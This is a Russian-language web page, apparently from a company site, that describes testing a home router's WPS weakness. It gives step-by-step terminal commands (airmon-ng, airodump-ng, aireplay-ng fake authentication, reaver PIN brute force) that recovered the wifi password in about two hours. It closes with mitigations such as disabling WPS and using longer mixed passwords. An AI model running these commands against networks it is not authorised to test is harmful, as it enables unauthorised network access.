Яндекс.Метрика

Защита от взломщиков wifi сети

Нужны новые клиенты? Тогда Вам рекомендуем посмотреть этот раздел нашего сайта
_____

Решили проверить можно ли взломать локальную wifi сеть через уязвимость, которая есть практически на каждом современном роутере, а именно через, по умолчанию включенную, WPS. 

Начальные условия: роутер кинетик, пароль численный = 8 знаков, нетбук с убунтой со встроенным wifi модулем, предустановленны программы airmon, airodump и aireplay. 

Через терминал:
– переводим наш адаптер в режим мониторинга, при этом появится новый интерфейс: sudo airmon-ng start wlan0
– сканируем окружающие нас точки доступа: sudo airodump-ng mon0
– сканируем отдельную точку: sudo airodump-ng –c 6 mon0 –bssid MAC_ADDR // можно указать опцию -c Номер_Канала (6-ка это канал wifi можно ставить и другие каналы). Предыдущий шаг нам наглядно демонстрирует по какому каналу “пробивается” роутер. Я думаю, вы догадались что после опции –bssid надо писать МАК роутера (его BSSID) //

“- wash –i mon0″ – почему-то не срабатывает, пробовали и bssid в конце” – подробнее о этой команде можно найти в интернете

– Далее посылаем фальшивый запрос на аутентификацию sudo aireplay-ng -1 10 -a MAC_ADDR -e DIR-300NRU mon0 // DIR-300NRU сетевое wifi имя // 
– И начнем подбирать пароль программой reaver: sudo reaver -i mon0 -b MAC_ADDR -s –vv

На взлом wifi сети ушло порядка 2 часов, в конце последняя команда выдала правильный пароль. 
Для взлома естественно нужен хороший уровень сигнала иначе сама процедура взлома будет идти мучительно долго. 

Лекарство от взлома: выключить WPS, сделать пароль численно буквенный превышающий 8 символов, также по хорошему посмотреть на открытость доступов по телнет, ssh и пр. удаленностям. 

P.S. наиболее полно и интересно функции airmon, airodump и aireplay описаны здесь https://forum.antichat.ru/thread50472.html






Заказать звонок
+
Жду звонка!